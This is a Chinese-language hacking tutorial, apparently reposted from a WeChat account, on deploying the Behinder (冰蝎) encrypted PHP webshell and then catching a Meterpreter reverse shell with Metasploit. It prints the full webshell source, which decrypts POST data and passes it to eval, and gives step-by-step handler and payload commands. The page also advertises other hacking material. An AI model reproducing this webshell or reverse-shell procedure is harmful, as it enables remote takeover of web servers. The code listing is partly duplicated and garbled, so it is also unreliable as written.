冰蝎连接木马到反弹shell拿到权限全过程

原创
2020/11/25 12:30
阅读数 1.5K

扫码领资料

获黑客教程

免费&进群



掌控安全学员-1596376292 投稿


一.冰蝎简介


1.什么是冰蝎

“冰蝎”是一个动态二进制加密网站管理客户端。

在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。

基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。


二.冰蝎连接getshell方法



1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎)

连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16]


<?php

@errorreporting(0);
session_start();
$key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
<?php
@error_reporting(0);
session_start();
$key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION[‘k’]=$key;
$post=file_get_contents(“php://input”);
if(!extension_loaded(‘openssl’))
{
$t=”base64“.”decode”;
$post=$t($post.””);

  
  
  1. for($i=0;$i<strlen($post);$i++){

  2. $post[$i]= $post[$i]^$key[$i+1&15];

  3. }

  4. }

  5. else

  6. {

  7. $post=openssl_decrypt($post,"AES128", $key);

  8. }

  9. $arr=explode('|',$post);

  10. $func=$arr[0];

  11. $params=$arr[1];

  12. class C{publicfunction __invoke($p){eval($p."");}}

  13. @call_user_func(new C(),$params);

?>

三.冰蝎getshell

1.建好的木马放入我们phpstudy网站的根目录


2.到我们的位置为 192.168.43.61/1.php



3.始连接冰蝎,点击保存


在冰蝎处 显示为此页面,则表示连接成功

四.开始反弹shell启用监听meterpreter功能

1.点击反弹shell


2.在IP地址上写上你本机kali的ip


2.1查找kali ip 的方法 命令框中输入 ip addr




3.2填上ip和端口,端口可以任意填写




此时注意不用那么快点击“给我连按钮”


4.先打开kali的msf监听设备 在命令框中输入msfconsole



此时为打开状态


5.使用use exploit/multi/handler 命令



此时弹出让我们输入payload的命令我们将此命令输入set payload 

php/meterpreter/reverse_tcp


此时输入成功


6.show options 我们就可以看设置了,我们会发现我们的靶机已经连上了




7.接着我们连上我们的主机 set lhost 192.168.43.61



8.Show options 我们会发现我们的主机已经连上



9.执行 exploit 命令执行监听,此时我们就可以返回冰蝎反弹shell执行接下来的操作



10 点击给我连




11.我们在返回kali 此时我们就已经可以开始监听了




12.执行 sysinfo 我们就可以知道靶机的系统信息



结束



学习更多黑客技体验靶场实战练习

黑客视频资料及工具


往期内容回顾


渗透某赌博网站杀猪盘的经历!

手把手教你如何远程监听他人手机

黑客网站大全!都在这了!速看被删就没了






本文分享自微信公众号 - 暗网黑客(HackRead)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

展开阅读全文
打赏
0
0 收藏
分享
加载中
更多评论
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部